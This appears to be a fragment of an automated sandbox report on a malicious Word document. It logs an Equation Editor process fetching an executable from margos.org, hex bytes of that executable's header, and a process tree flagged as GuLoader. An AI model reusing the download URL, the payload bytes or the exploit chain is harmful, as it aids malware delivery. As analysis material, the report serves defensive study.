        Jan 24, 2022 13:11:08.138796091 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.138813019 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.138840914 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.138869047 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.138876915 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.138884068 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.138927937 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.138943911 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.138972044 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.139008045 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.139029980 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.172384977 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.320950985 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.320975065 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.321069002 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.321638107 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.321657896 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.321676016 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.321691036 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.321692944 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.321705103 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.321712017 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.321722984 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.321729898 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.321754932 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.321774006 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.321782112 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.321822882 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.321822882 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.321841955 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.321872950 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.321877003 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.321887016 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.321894884 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.321916103 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.321933985 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.322629929 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.502902031 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.503001928 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.503209114 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.503242970 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.503763914 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.503830910 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.503864050 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.503890991 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.503938913 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.503952026 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.504013062 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.504055977 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.504075050 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.504120111 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.504137993 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.504200935 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.504219055 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.504259109 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.504264116 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.504300117 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.504336119 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.504359961 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.504422903 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.504427910 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.504489899 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.504508018 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.504550934 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.504595041 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.504616022 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.504657984 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.504684925 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.504966021 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.505027056 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.505059004 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.505079985 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.505109072 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.505130053 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.505183935 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.505187035 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.505208015 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.505244970 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.505264997 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.505299091 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.505327940 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.505354881 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.505453110 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.505507946 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.505887985 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.685264111 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.685323000 CET8049165131.153.37.3192.168.2.22
        TimestampSource PortDest PortSource IPDest IP
        Jan 24, 2022 13:11:07.535217047 CET5216753192.168.2.228.8.8.8
        Jan 24, 2022 13:11:07.721467018 CET53521678.8.8.8192.168.2.22
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
        Jan 24, 2022 13:11:07.535217047 CET192.168.2.228.8.8.80x6831Standard query (0)margos.orgA (IP address)IN (0x0001)
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
        Jan 24, 2022 13:11:07.721467018 CET8.8.8.8192.168.2.220x6831No error (0)margos.org131.153.37.3A (IP address)IN (0x0001)
        • margos.org
        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.2249165131.153.37.380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        TimestampkBytes transferredDirectionData
        Jan 24, 2022 13:11:07.938873053 CET0OUTGET /dda/SYNT.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: margos.org
        Connection: Keep-Alive
        Jan 24, 2022 13:11:08.138510942 CET2INHTTP/1.1 200 OK
        Date: Mon, 24 Jan 2022 12:11:08 GMT
        Server: Apache
        Last-Modified: Sun, 23 Jan 2022 21:05:28 GMT
        Accept-Ranges: bytes
        Content-Length: 95264
        Keep-Alive: timeout=5, max=200
        Connection: Keep-Alive
        Content-Type: application/x-msdownload
        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 04 00 00 04 00 00 55 80 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 28 0e 00 00 00 00 00 00 00 00 00 00 a0 5f 01 00 80 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 28 0e 00 00 00 c0 04 00 00 10 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 08 4f 43 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00
        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELZOaj-5@U@(_.texthj `.rdatan@@.data@.ndata``.rsrc(@@U\}t+}FEuHOCHPuuu@B


        Click to jump to process

        Start time:13:10:18
        Start date:24/01/2022
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13fd20000
        File size:1423704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Start time:13:10:20
        Start date:24/01/2022
        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        Imagebase:0x400000
        File size:543304 bytes
        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Start time:13:10:22
        Start date:24/01/2022
        Path:C:\Users\user\AppData\Roaming\Puportd92.exe
        Wow64 process (32bit):true
        Commandline:C:\Users\user\AppData\Roaming\Puportd92.exe
        Imagebase:0x400000
        File size:95264 bytes
        MD5 hash:37FC2AA213D1607545A9B876F4AA543E
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.745732792.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
        Antivirus matches:
        • Detection: 5%, ReversingLabs
        Reputation:low

        No disassembly